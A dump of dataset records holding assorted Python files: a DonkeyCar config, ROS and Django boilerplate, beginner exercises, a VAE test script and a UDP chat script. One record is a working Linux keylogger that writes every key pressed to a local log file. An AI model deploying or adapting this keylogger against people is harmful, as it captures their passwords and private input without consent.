Dataset schema (29 columns; one record per source file):

| Column | Type |
|---|---|
| blob_id | string (length 40) |
| directory_id | string (length 40) |
| path | string (length 2 to 616) |
| content_id | string (length 40) |
| detected_licenses | list (0 to 69 items) |
| license_type | string (2 classes) |
| repo_name | string (length 5 to 118) |
| snapshot_id | string (length 40) |
| revision_id | string (length 40) |
| branch_name | string (length 4 to 63) |
| visit_date | timestamp[us] |
| revision_date | timestamp[us] |
| committer_date | timestamp[us] |
| github_id | int64 (2.91k to 686M, may be null) |
| star_events_count | int64 (0 to 209k) |
| fork_events_count | int64 (0 to 110k) |
| gha_license_id | string (23 classes) |
| gha_event_created_at | timestamp[us] |
| gha_created_at | timestamp[us] |
| gha_language | string (213 classes) |
| src_encoding | string (30 classes) |
| language | string (1 class) |
| is_vendor | bool |
| is_generated | bool |
| length_bytes | int64 (2 to 10.3M) |
| extension | string (246 classes) |
| content | string (length 2 to 10.3M) |
| authors | list (1 item) |
| author_id | string (length 0 to 212) |

The records below list these fields in the order above, separated by `|`:
e52d62f737d446777cfd8dea8b7693500b35f7dc
|
d81c01dcef11874b85db910e2698f0c51357d69e
|
/myconfig.py
|
947b2b5b303a0b3b15b6c1d0c53c259baa04e0be
|
[] |
no_license
|
dgwanggl/DonkeyCar20191102
|
45e2412ffef56c60fb5ddf1c1868316140ae7cd0
|
2474507247dfb6a6bfb510d4ad4258dab40c67a1
|
refs/heads/master
| 2020-09-02T09:55:08.787135
| 2019-11-03T12:51:36
| 2019-11-03T12:51:36
| 219,138,418
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,252
|
py
|
# """
# My CAR CONFIG
# This file is read by your car application's manage.py script to change the car
# performance
# If desired, all config overrides can be specified here.
# The update operation will not touch this file.
# """
# import os
#
# #PATHS
# CAR_PATH = PACKAGE_PATH = os.path.dirname(os.path.realpath(__file__))
# DATA_PATH = os.path.join(CAR_PATH, 'data')
# MODELS_PATH = os.path.join(CAR_PATH, 'models')
#
# #VEHICLE
# DRIVE_LOOP_HZ = 20 # the vehicle loop will pause if faster than this speed.
# MAX_LOOPS = None # the vehicle loop can abort after this many iterations, when given a positive integer.
#
# #CAMERA
# CAMERA_TYPE = "PICAM" # (PICAM|WEBCAM|CVCAM|CSIC|V4L|MOCK)
# IMAGE_W = 160
# IMAGE_H = 120
# IMAGE_DEPTH = 3 # default RGB=3, make 1 for mono
# CAMERA_FRAMERATE = DRIVE_LOOP_HZ
#
# #PCA9685, overrides only if needed, i.e. TX2..
# PCA9685_I2C_ADDR = 0x40 #I2C address, use i2cdetect to validate this number
# PCA9685_I2C_BUSNUM = None #None will auto detect, which is fine on the pi. But other platforms should specify the bus num.
#
# #DRIVETRAIN
# #These options specify which chassis and motor setup you are using. Most are using SERVO_ESC.
# #DC_STEER_THROTTLE uses HBridge pwm to control one steering dc motor, and one drive wheel motor
# #DC_TWO_WHEEL uses HBridge pwm to control two drive motors, one on the left, and one on the right.
# #SERVO_HBRIDGE_PWM use ServoBlaster to output pwm control from the PiZero directly to control steering, and HBridge for a drive motor.
# DRIVE_TRAIN_TYPE = "SERVO_ESC" # SERVO_ESC|DC_STEER_THROTTLE|DC_TWO_WHEEL|SERVO_HBRIDGE_PWM
#
# #STEERING
STEERING_CHANNEL = 1 #channel on the 9685 pwm board 0-15
STEERING_LEFT_PWM = 480 #pwm value for full left steering
STEERING_RIGHT_PWM = 320 #pwm value for full right steering
#
# #THROTTLE
THROTTLE_CHANNEL = 0 #channel on the 9685 pwm board 0-15
THROTTLE_FORWARD_PWM = 455 #pwm value for max forward throttle
THROTTLE_STOPPED_PWM = 400 #pwm value for no movement
THROTTLE_REVERSE_PWM = 250 #pwm value for max reverse throttle
#
# #DC_STEER_THROTTLE with one motor as steering, one as drive
# #these GPIO pinouts are only used for the DRIVE_TRAIN_TYPE=DC_STEER_THROTTLE
# HBRIDGE_PIN_LEFT = 18
# HBRIDGE_PIN_RIGHT = 16
# HBRIDGE_PIN_FWD = 15
# HBRIDGE_PIN_BWD = 13
#
# #DC_TWO_WHEEL - with two wheels as drive, left and right.
# #these GPIO pinouts are only used for the DRIVE_TRAIN_TYPE=DC_TWO_WHEEL
# HBRIDGE_PIN_LEFT_FWD = 18
# HBRIDGE_PIN_LEFT_BWD = 16
# HBRIDGE_PIN_RIGHT_FWD = 15
# HBRIDGE_PIN_RIGHT_BWD = 13
#
#
# #TRAINING
# #The DEFAULT_MODEL_TYPE will choose which model will be created at training time. This chooses
# #between different neural network designs. You can override this setting by passing the command
# #line parameter --type to the python manage.py train and drive commands.
# DEFAULT_MODEL_TYPE = 'linear' #(linear|categorical|rnn|imu|behavior|3d|localizer|latent)
# BATCH_SIZE = 128 #how many records to use when doing one pass of gradient descent. Use a smaller number if your gpu is running out of memory.
# TRAIN_TEST_SPLIT = 0.8 #what percent of records to use for training. the remaining used for validation.
# MAX_EPOCHS = 100 #how many times to visit all records of your data
# SHOW_PLOT = True #would you like to see a pop up display of final loss?
# VEBOSE_TRAIN = True #would you like to see a progress bar with text during training?
# USE_EARLY_STOP = True #would you like to stop the training if we see it's not improving fit?
# EARLY_STOP_PATIENCE = 5 #how many epochs to wait before no improvement
# MIN_DELTA = .0005 #early stop will want this much loss change before calling it improved.
# PRINT_MODEL_SUMMARY = True #print layers and weights to stdout
# OPTIMIZER = None #adam, sgd, rmsprop, etc.. None accepts default
# LEARNING_RATE = 0.001 #only used when OPTIMIZER specified
# LEARNING_RATE_DECAY = 0.0 #only used when OPTIMIZER specified
# SEND_BEST_MODEL_TO_PI = False #change to true to automatically send best model during training
# CACHE_IMAGES = True #keep images in memory. will speed successive epochs, but crater if not enough mem.
#
# PRUNE_CNN = False #This will remove weights from your model. The primary goal is to increase performance.
# PRUNE_PERCENT_TARGET = 75 # The desired percentage of pruning.
# PRUNE_PERCENT_PER_ITERATION = 20 # Percentage of pruning performed per iteration.
# PRUNE_VAL_LOSS_DEGRADATION_LIMIT = 0.2 # The max amount of validation loss that is permitted during pruning.
# PRUNE_EVAL_PERCENT_OF_DATASET = .05 # percent of dataset used to perform evaluation of model.
#
# #Pi login information
# #When using the continuous train option, these credentials will
# #be used to copy the final model to your vehicle. If not using this option, no need to set these.
# PI_USERNAME = "pi" # username on pi
# PI_PASSWD = "raspberry" # password is optional. Only used from Windows machine. Ubuntu and mac users should copy their public keys to the pi. `ssh-copy-id username@hostname`
# PI_HOSTNAME = "raspberrypi.local" # the network hostname or ip address
# PI_DONKEY_ROOT = "/home/pi/mycar" # the location of the mycar dir on the pi. this will be used to help locate the final model destination.
#
# # Region of interest cropping
# # only supported in Categorical and Linear models.
# # If these crop values are too large, they will cause the stride values to become negative and the model will not be valid.
# ROI_CROP_TOP = 0 #the number of rows of pixels to ignore on the top of the image
# ROI_CROP_BOTTOM = 0 #the number of rows of pixels to ignore on the bottom of the image
#
# #Model transfer options
# #When copying weights during a model transfer operation, should we freeze a certain number of layers
# #to the incoming weights and not allow them to change during training?
# FREEZE_LAYERS = False #default False will allow all layers to be modified by training
# NUM_LAST_LAYERS_TO_TRAIN = 7 #when freezing layers, how many layers from the last should be allowed to train?
#
#
# #JOYSTICK
# USE_JOYSTICK_AS_DEFAULT = False #when starting the manage.py, when True, will not require a --js option to use the joystick
# JOYSTICK_MAX_THROTTLE = 0.5 #this scalar is multiplied with the -1 to 1 throttle value to limit the maximum throttle. This can help if you drop the controller or just don't need the full speed available.
# JOYSTICK_STEERING_SCALE = 1.0 #some people want a steering that is less sensitive. This scalar is multiplied with the steering -1 to 1. It can be negative to reverse dir.
# AUTO_RECORD_ON_THROTTLE = True #if true, we will record whenever throttle is not zero. if false, you must manually toggle recording with some other trigger. Usually circle button on joystick.
# CONTROLLER_TYPE='ps3' #(ps3|ps4|xbox|nimbus|wiiu|F710)
# USE_NETWORKED_JS = False #should we listen for remote joystick control over the network?
# NETWORK_JS_SERVER_IP = "192.168.0.1"#when listening for network joystick control, which ip is serving this information
# JOYSTICK_DEADZONE = 0.0 # when non zero, this is the smallest throttle before recording triggered.
# JOYSTICK_THROTTLE_DIR = -1.0 # use -1.0 to flip forward/backward, use 1.0 to use joystick's natural forward/backward
#
# #For the categorical model, this limits the upper bound of the learned throttle
# #it's very IMPORTANT that this value is matched from the training PC config.py and the robot.py
# #and ideally wouldn't change once set.
# MODEL_CATEGORICAL_MAX_THROTTLE_RANGE = 0.5
#
# #RNN or 3D
# SEQUENCE_LENGTH = 3 #some models use a number of images over time. This controls how many.
#
# #IMU
# HAVE_IMU = False #when true, this adds an Mpu6050 part and records the data. Can be used with a
#
# #SOMBRERO
# HAVE_SOMBRERO = False #set to true when using the sombrero hat from the Donkeycar store. This will enable pwm on the hat.
#
# #RECORD OPTIONS
# RECORD_DURING_AI = False #normally we do not record during ai mode. Set this to true to get image and steering records for your Ai. Be careful not to use them to train.
#
# #LED
# HAVE_RGB_LED = False #do you have an RGB LED like https://www.amazon.com/dp/B07BNRZWNF
# LED_INVERT = False #COMMON ANODE? Some RGB LED use common anode. like https://www.amazon.com/Xia-Fly-Tri-Color-Emitting-Diffused/dp/B07MYJQP8B
#
# #LED board pin number for pwm outputs
# #These are physical pinouts. See: https://www.raspberrypi-spy.co.uk/2012/06/simple-guide-to-the-rpi-gpio-header-and-pins/
# LED_PIN_R = 12
# LED_PIN_G = 10
# LED_PIN_B = 16
#
# #LED status color, 0-100
# LED_R = 0
# LED_G = 0
# LED_B = 1
#
# #LED Color for record count indicator
# REC_COUNT_ALERT = 1000 #how many records before blinking alert
# REC_COUNT_ALERT_CYC = 15 #how many cycles of 1/20 of a second to blink per REC_COUNT_ALERT records
# REC_COUNT_ALERT_BLINK_RATE = 0.4 #how fast to blink the led in seconds on/off
#
# #first number is record count, second tuple is color ( r, g, b) (0-100)
# #when record count exceeds that number, the color will be used
# RECORD_ALERT_COLOR_ARR = [ (0, (1, 1, 1)),
# (3000, (5, 5, 5)),
# (5000, (5, 2, 0)),
# (10000, (0, 5, 0)),
# (15000, (0, 5, 5)),
# (20000, (0, 0, 5)), ]
#
#
# #LED status color, 0-100, for model reloaded alert
# MODEL_RELOADED_LED_R = 100
# MODEL_RELOADED_LED_G = 0
# MODEL_RELOADED_LED_B = 0
#
#
# #BEHAVIORS
# #When training the Behavioral Neural Network model, make a list of the behaviors,
# #Set the TRAIN_BEHAVIORS = True, and use the BEHAVIOR_LED_COLORS to give each behavior a color
# TRAIN_BEHAVIORS = False
# BEHAVIOR_LIST = ['Left_Lane', "Right_Lane"]
# BEHAVIOR_LED_COLORS =[ (0, 10, 0), (10, 0, 0) ] #RGB tuples 0-100 per channel
#
# #Localizer
# #The localizer is a neural network that can learn to predict its location on the track.
# #This is an experimental feature that needs more development. But it can currently be used
# #to predict the segment of the course, where the course is divided into NUM_LOCATIONS segments.
# TRAIN_LOCALIZER = False
# NUM_LOCATIONS = 10
# BUTTON_PRESS_NEW_TUB = False #when enabled, makes it easier to divide our data into one tub per track length if we make a new tub on each X button press.
#
# #DonkeyGym
# #Only on Ubuntu linux, you can use the simulator as a virtual donkey and
# #issue the same python manage.py drive command as usual, but have them control a virtual car.
# #This enables that, and sets the path to the simulator and the environment.
# #You will want to download the simulator binary from: https://github.com/tawnkramer/donkey_gym/releases/download/v18.9/DonkeySimLinux.zip
# #then extract that and modify DONKEY_SIM_PATH.
# DONKEY_GYM = False
# DONKEY_SIM_PATH = "path to sim" #"/home/tkramer/projects/sdsandbox/sdsim/build/DonkeySimLinux/donkey_sim.x86_64"
# DONKEY_GYM_ENV_NAME = "donkey-generated-track-v0" # ("donkey-generated-track-v0"|"donkey-generated-roads-v0"|"donkey-warehouse-v0"|"donkey-avc-sparkfun-v0")
#
# #publish camera over network
# #This is used to create a tcp service to publish the camera feed
# PUB_CAMERA_IMAGES = False
#
# #When racing, to give the ai a boost, configure these values.
# AI_LAUNCH_DURATION = 0.0 # the ai will output throttle for this many seconds
# AI_LAUNCH_THROTTLE = 0.0 # the ai will output this throttle value
# AI_LAUNCH_ENABLE_BUTTON = 'R2' # this keypress will enable this boost. It must be enabled before each use to prevent accidental trigger.
# AI_LAUNCH_KEEP_ENABLED = False # when False (default) you will need to hit the AI_LAUNCH_ENABLE_BUTTON for each use. This is safest. When True, it stays active on each trip into "local" ai mode.
#
# #Scale the output of the throttle of the ai pilot for all model types.
# AI_THROTTLE_MULT = 1.0 # this multiplier will scale every throttle value for all output from NN models
#
# #Path following
# PATH_FILENAME = "donkey_path.pkl" #the path will be saved to this filename
# PATH_SCALE = 5.0 # the path display will be scaled by this factor in the web page
# PATH_OFFSET = (0, 0) # 255, 255 is the center of the map. This offset controls where the origin is displayed.
# PATH_MIN_DIST = 0.3 # after travelling this distance (m), save a path point
# PID_P = -10.0 # proportional mult for PID path follower
# PID_I = 0.000 # integral mult for PID path follower
# PID_D = -0.2 # differential mult for PID path follower
# PID_THROTTLE = 0.2 # constant throttle value during path following
# SAVE_PATH_BTN = "cross" # joystick button to save path
# RESET_ORIGIN_BTN = "triangle" # joystick button to press to move car back to origin
|
[
"dgwang@gl.ck.tp.edu.tw"
] |
dgwang@gl.ck.tp.edu.tw
|
eecb83724e5947e68b51319cfa58e6fba11d101d
|
26bd189f367f43dcea8d64ad208015af5c74f7a3
|
/catkin_ws/build/rosaria/catkin_generated/pkg.develspace.context.pc.py
|
fc6de52f91947c5d87edc48832415349fa2e7153
|
[] |
no_license
|
RHaghighi/ROS-Workspace
|
2c19b9227d5374f1656ef13e859b16a06abbf64b
|
5d1f97f850cbc1db3f91c8ec939074da727ea35e
|
refs/heads/master
| 2021-01-21T23:08:41.525072
| 2017-06-23T07:11:42
| 2017-06-23T07:11:42
| 95,192,643
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 479
|
py
|
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "/home/reza/catkin_ws/devel/include".split(';') if "/home/reza/catkin_ws/devel/include" != "" else []
PROJECT_CATKIN_DEPENDS = "roscpp;nav_msgs;geometry_msgs;sensor_msgs;tf".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "rosaria"
PROJECT_SPACE_DIR = "/home/reza/catkin_ws/devel"
PROJECT_VERSION = "0.9.0"
|
[
"reza0007@e.ntu.edu.sg"
] |
reza0007@e.ntu.edu.sg
|
da3014c5f84dce1763f097a4906eca9d63763ba6
|
01d1dcb25662aca00eae607604202c579def987d
|
/aula01.py
|
484a415fd860ba825e395e3c35a3d87199a4ca92
|
[] |
no_license
|
RebeccaMariahDEV/luiza_labs_python
|
ad1f24f557b62303cff28362c2973739f3cecb30
|
5a4279172ef2e73b6cfdb7c21d42b35fa8f190c2
|
refs/heads/main
| 2023-03-07T06:01:33.642736
| 2021-02-16T21:45:59
| 2021-02-16T21:45:59
| 339,523,738
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,342
|
py
|
"""
nome = input("Olá, qual o seu nome?\n")
idade = int(input(f"Prazer {nome}, sou o robô Becca, qual a sua idade?\n"))
robo_idade = 107
robo_idade = robo_idade - idade
print(f"Eu sou {robo_idade} anos mais velha que vc")
nome = input("Olá, qual seu nume?\n")
ano = input("Esta em qual ano da escola?\n")
print("Digite suas ultimas notas de matematica")
notas1 = float(input("primeira nota:\n"))
notas2 = float(input("Segunda nota:\n"))
notas3 = float(input("terceira nota:\n"))
resultado = (notas1 + notas2 + notas3) / 3
print(f"Sua media é: {resultado}")
num = int(input("Digite um valor inteiro de 1 a 100:\n"))
if (num % 3) == 0:
print("Dedezinho")
else:
print(num)
num = int(input("Digite um valor inteiro de 1 a 100:\n"))
if (num % 5) == 0:
print("Linda")
else:
print(num)
num = int(input("Digite um valor inteiro de 1 a 100:\n"))
if (num % 5) == 0 and (num % 3 ) == 0:
print("Dedezinha linda")
else:
print(num)
for num in '95876234585':
num = int(num)
if num ==4:
print('sou 2 +2')
elif num <= 3:
print("Sou pequeno")
else:
if num == 5:
num += num
print(f'5 não, sou {num}')
else:
print(num)
import random
for sorteio in range(5):
num_sorte = random.randint(10,50)
print(num_sorte)
from random import randint
nome = input('Qual o seu nome: ')
print(f'Olá {nome}, pense em um número de 1 a 20.')
for sorteio in range(1,7):
num = randint(1,20)
num1 = int(input('Consegue adivinhar? '))
if num1 == num:
print(f"Parabéns! Você acertou, número foi {num1}")
print('FIM!')
elif num1 > num:
print('OPS! digitou um número maior')
else:
print('OPS! digitou um número menor')
"""
from random import randint
nome = input('Qual o seu nome: ')
print(f'Olá {nome}, pense em um número de 1 a 20.')
for sorteio in range(1, 7):
num = randint(1, 20)
num1 = int(input('Consegue adivinhar? '))
if num1 == num:
print(f"Parabéns! Você acertou, número foi {num1}")
print('FIM!')
elif num1 > num:
print('OPS! digitou um número maior')
else:
print('OPS! digitou um número menor')
|
[
"noreply@github.com"
] |
RebeccaMariahDEV.noreply@github.com
|
9395f134fddab16f059972a1fc5919e91497138f
|
cb07b2de235ce781066c33237e4c2f3ae898eeae
|
/check_latent_disentangle.py
|
5852d795f24cd77f5bd83d91970e666d126e4efe
|
[] |
no_license
|
lchingen/vae
|
936fadf0786002d4b5e222f980c12d8b56cfbddf
|
52da036ed6ae7ba9a5eb7afc4bc334227287643f
|
refs/heads/master
| 2020-04-16T21:49:21.432578
| 2020-01-14T00:55:56
| 2020-01-14T00:55:56
| 165,941,496
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,984
|
py
|
import numpy as np
import tensorflow as tf
from tensorflow.contrib import predictor
from pathlib import Path
import matplotlib.pyplot as plt
from config import *
from helper import *
from utils import *
from model_fn import *
def shift(m_in, offset=0, dir='lr'):
# Generate permutation matrix
p = np.eye(m_in.shape[0])
p = np.roll(p, offset, axis=0).astype('int')
# Horizontal shift (left/right = +/- offset)
if dir == 'lr':
m_in = np.transpose(m_in, (2, 0, 1))
x = np.matmul(m_in, p)
return np.transpose(x, (1, 2, 0)).astype('uint8')
# Vertical shift (down/up = +/- offset)
if dir == 'ud':
x = np.matmul(m_in.T, p).T
return x.astype('uint8')
def plot_lines(data):
fig = plt.figure()
ax = plt.axes()
x = np.linspace(0, len(data)-1, len(data[0]))
for ii in range(data.shape[0]):
ax.plot(x, data[ii])
plt.show()
def main(unused_argv):
# Export model_fn to only use decoder
export_tf_model(FLAGS.export_path)
# Find latest frozen pb
subdirs = [x for x in Path(FLAGS.export_path + '/frozen_pb').iterdir()
if x.is_dir() and 'temp' not in str(x)]
latest = str(sorted(subdirs)[-1])
# Create predictor
predict_fn = predictor.from_saved_model(latest)
# Read image
x = load_img('./imgs/end.jpg')
x_shift = shift(x, offset=5, dir='lr')
x = x[None, ...] /255.0
x_shift = x_shift[None, ...] /255.0
x_val = np.vstack((x, x_shift))
dict_in = {'x': x_val, 'z': np.zeros(z_dim)[None]}
# Make predictions and fetch results from output dict
z = predict_fn(dict_in)['mu']
plot_lines(z)
#z_shift = np.roll(z, 20, axis = 1)
#z_val = np.vstack((z, z_shift))
#dict_in = {'x': np.zeros(input_dim)[None], 'z': z_val}
#y, y_shift = predict_fn(dict_in)['y']
#compare(y, y_shift)
if __name__ == '__main__':
tf.app.flags.DEFINE_string('mode', None, 'TRAIN/TEST')
tf.app.run()
|
[
"lchingen@umich.edu"
] |
lchingen@umich.edu
|
0c7290843c9f8d6897b2f1b76ea235028e543e27
|
d101eb3cd3278862bf6905c1e8609083998658ca
|
/blogprojectt/urls.py
|
21364890b2aaded673188fcc35d4b89a71b20633
|
[] |
no_license
|
ae129/8-12-
|
ad5d04efbd3e8fd2c0790b66bfa42d6a9467ef19
|
07ff9d30440a0568194fa74119efeb165acc4978
|
refs/heads/master
| 2022-11-30T04:52:28.723740
| 2020-08-12T06:46:12
| 2020-08-12T06:46:12
| 286,939,566
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 820
|
py
|
"""blogproject URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
import blogapp.views
urlpatterns = [
path('admin/', admin.site.urls),
path('',blogapp.views.home, name="home"),
]
|
[
"ae129@likelion.org"
] |
ae129@likelion.org
|
5b6d751d75236b022dcbd6d4b0dd04f439e67320
|
e834ff12cb1dc086057496147ad15fe272b2f592
|
/chainerio/__init__.py
|
b7d5e441be78df1990177c978cfdeecdb65755a1
|
[
"MIT"
] |
permissive
|
msakai/pfio
|
6d65d64e2d6a607e7709b8d6ec92352aef0695ec
|
29e5c6d6b15d33c7e7e468b42c58d24dae3d8cad
|
refs/heads/master
| 2022-10-13T13:52:29.229337
| 2020-06-08T07:11:18
| 2020-06-08T07:11:18
| 267,463,856
| 0
| 0
|
MIT
| 2020-05-28T01:27:16
| 2020-05-28T01:27:15
| null |
UTF-8
|
Python
| false
| false
| 110
|
py
|
import sys
# make sure pfio is in sys.modules
import pfio # NOQA
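# Replace this module object in sys.modules so that `import chainerio`
# transparently resolves to the pfio package (a module-aliasing shim).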
sys.modules[__name__] = __import__('pfio')
|
[
"tianqi@preferred.jp"
] |
tianqi@preferred.jp
|
88f030ed4549f41fed34303dd53903c61e595dd0
|
f768ddba19c7bc7664ae581daeef5fe2f650a539
|
/leetcode/engineer.py
|
b3011086b8f515a4bc54c41902609a4cfd17af7e
|
[] |
no_license
|
douwings/pythonWork
|
36ac2ba32a721ed6d9af62a9168eee12a61891af
|
70f84eb179e12cc36b521fdb9a2573a14a300d23
|
refs/heads/master
| 2022-12-23T18:41:50.560391
| 2020-09-28T06:20:36
| 2020-09-28T06:20:36
| 273,136,705
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 255
|
py
|
class Solution:
def maxPerformance(self, n, speed, efficiency, k) -> int:
return 123
if __name__ == '__main__':
solution = Solution()
print(solution.maxPerformance(n=6, speed=[2, 10, 3, 1, 5, 8], efficiency=[5, 4, 3, 9, 7, 2], k=2))
|
[
"1020763068@qq.com"
] |
1020763068@qq.com
|
de8ef67ffbc4f74884821c563da1435f68295fda
|
2157782cf5875767f8d1fe0bb07243da2e87600d
|
/test_from_myself/djangoTest/helloworld/helloworld/urls.py
|
42b5c79e380185708b4639f06d761c36e10fa6c8
|
[] |
no_license
|
mouday/SomeCodeForPython
|
9bc79e40ed9ed851ac11ff6144ea080020e01fcd
|
ddf6bbd8a5bd78f90437ffa718ab7f17faf3c34b
|
refs/heads/master
| 2021-05-09T22:24:47.394175
| 2018-05-11T15:34:22
| 2018-05-11T15:34:22
| 118,750,143
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,267
|
py
|
"""helloworld URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/dev/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.conf.urls import url
from django.urls import path
from . import views
from . import testdb
from . import search
urlpatterns = [
path('admin/', admin.site.urls),
url('^hello$', views.hello),
url('^sayhello$', views.sayhello),
url('^label$', views.label),
url('^child$', views.child),
url('^insertdb$', testdb.insertdb),
url('^getbd$', testdb.getdb),
url('^updatedb$', testdb.updatedb),
url('^deletedb$', testdb.deletedb),
url('^search$', search.search),
url('^search_form$', search.search_form),
url('^search-post$', search.search_post),
]
|
[
"1940607002@qq.com"
] |
1940607002@qq.com
|
ec944faf2da82dbef93beb5986cc59efed81baf4
|
504d1c5701b9bf04c86e40eebefe75e620f68852
|
/linux/keylogger/keylogger.py
|
e1f70c0290845ba7576fb5fe82b89ee9ad217dda
|
[
"MIT"
] |
permissive
|
jackzhp/Keylogger
|
524ccc421c569ff959dd43c9bf3b982c0f1304ea
|
8d0377a7f571a105351618d03e4670d8a1702c69
|
refs/heads/master
| 2021-03-30T02:28:19.309392
| 2021-02-16T02:16:00
| 2021-02-16T02:16:00
| 248,006,796
| 0
| 0
|
MIT
| 2020-03-17T15:34:14
| 2020-03-17T15:34:13
| null |
UTF-8
|
Python
| false
| false
| 1,793
|
py
|
#!/usr/bin/env python
import os
from argparse import ArgumentParser
from datetime import datetime
from keylogger import pyxhook
def main():
ts = datetime.now().strftime("%d-%m-%Y_%H:%M:%S")
parser = ArgumentParser(description='A simple keylogger for Linux.')
parser.add_argument(
'--log-file',
default=os.path.join(os.getcwd(), 'keys-' + str(ts) + '.log'),
help='Save the output in this file.',
)
parser.add_argument(
'--clean-file',
action='store_true',
default=False,
help='Clear the log file on startup. Default is No.',
)
parser.add_argument(
'--cancel-key',
help='A single key to use as the cancel key. Default is ` (backtick).',
)
args = parser.parse_args()
log_file = args.log_file
if args.clean_file:
try:
os.remove(log_file)
except OSError:
# TODO: log with logging module
pass
cancel_key = args.cancel_key[0] if args.cancel_key else '`'
def OnKeyPress(event):
with open(log_file, 'a') as f:
f.write('{}\n'.format(event.Key))
if chr(event.Ascii) == cancel_key:  # event.Ascii is an integer; compare it as a character
new_hook.cancel()
new_hook = pyxhook.HookManager()
new_hook.KeyDown = OnKeyPress
new_hook.HookKeyboard()
try:
new_hook.start()
except KeyboardInterrupt:
# User cancelled from command line.
pass
except Exception as ex:
# Write exceptions to the log file, for analysis later.
msg = 'Error while catching events:\n {}'.format(ex)
pyxhook.print_err(msg)
with open(log_file, 'a') as f:
f.write('\n{}'.format(msg))
if __name__ == '__main__':
main()
|
[
"noreply@github.com"
] |
jackzhp.noreply@github.com
|
4eb0ba253951459b3ec638970f1e653ab9f61577
|
0393d550fbdc08259ccdfd843215a01443fb4af2
|
/Web/WEBoutput.py
|
9d7a5d9075b52d95b299434f0859ee5fbf9919bf
|
[] |
no_license
|
lmingari/lidar_SMN
|
e8b17a33b8fc77d549b219c4f56edc23afdea0d0
|
52293ece21048424e1cb265f6220f6859b608ae9
|
refs/heads/master
| 2021-04-09T14:34:27.708556
| 2019-05-02T13:08:21
| 2019-05-02T13:08:21
| 125,753,349
| 0
| 1
| null | 2019-05-02T11:21:22
| 2018-03-18T18:06:42
|
Python
|
UTF-8
|
Python
| false
| false
| 1,522
|
py
|
#!/usr/bin/python2
# -*- coding: utf-8 -*-
from IOweb import lidar2js, connect_ftp, upload_file
from os.path import isfile, join
import jinja2
fname_template_intramet = "/home/lmingari/lidar_v2.1/Web/template_intramet.html"
fname_template_mireta = "/home/lmingari/lidar_v2.1/Web/template_mireta.html"
st_name = {'comodoro': "Comodoro Rivdavia station",
'bariloche': "Bariloche station",
'aeroparque': "Aeroparque station",
'parenas': "Punta Arenas station",
'neuquen': "Neuquen station",
'vmartelli': "Villa Martelli station",
'cordoba': "Cordoba station",
}
def CreateJS(block, ncpath, ncfile):
fname_js = "{}.js".format(block)
fname_html = "{}.html".format(block)
tag = {'title': "Lidar - Interactive visualization"}
tag['header'] = st_name[block]
tag["block"] = lidar2js( ncpath,ncfile,fname_js )
with open(fname_template_intramet, 'r') as f:
html_data = f.read()
template_html=jinja2.Template(html_data)
with open(join(ncpath, fname_html), 'w') as f:
html_out = template_html.render(tag)
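# Take the first id="..." attribute from the rendered HTML and append it to the
# JS filename as a ?ver= query string, so browsers re-fetch the script when the
# page content changes (simple cache busting).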
id_number = html_out.split("id=")[1].split('"')[1]
f.write(html_out.replace(fname_js,"{}?ver={}".format(fname_js,id_number)))
with open(fname_template_mireta, 'r') as f:
html_data = f.read()
fname_html = "{}_b.html".format(block)
template_html=jinja2.Template(html_data)
with open(join(ncpath, fname_html), 'w') as f:
f.write(template_html.render(tag))
|
[
"lmingari@gmail.com"
] |
lmingari@gmail.com
|
866a1e1376f7edd8fd9593aebce114615de4cd1d
|
353b36f50b9bacef8ab79c263ca60bd5d7f8fda3
|
/newsen
|
19c9f9a5a893fea490be75fc898d8eceda1eee26
|
[] |
no_license
|
navratansingh/nav
|
57186b1427b040d0d4928d848f8d40aabcd8981e
|
a10e344f9da23af9b0c91a67839ddfe66f1a5618
|
refs/heads/master
| 2020-03-17T01:13:59.542196
| 2018-05-19T11:53:12
| 2018-05-19T11:53:12
| 133,144,927
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 311
|
#!/usr/bin/python2
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
message=raw_input("navratan")
s.sendto(message,("192.168.10.68",9333))
while 5:
message=raw_input("navratan")
n = s.recvfrom(5000)
print n[0]
s.sendto(message,("192.168.10.68",n[1][1]))
#s.bind((n[1][0],n[1][1]))
|
[
"navratan1331@gmail.com"
] |
navratan1331@gmail.com
|
|
9f96ceedd369c3d2a189cc8b0e9e20634e0b3d00
|
821051afcf93e84b8411c9486b4534fe8462538a
|
/solver.py
|
1595efbc6ea163a336a1f7caf667219d94647d9c
|
[] |
no_license
|
lw-git/Game_15
|
539f826bb1cc42aaf9e4db0f5084ab2e82f19d44
|
93f5af3d05afba52cd6e7012adf5bc73bf069f3d
|
refs/heads/master
| 2022-12-19T08:25:51.921631
| 2020-09-06T06:55:12
| 2020-09-06T06:55:12
| 281,867,523
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,116
|
py
|
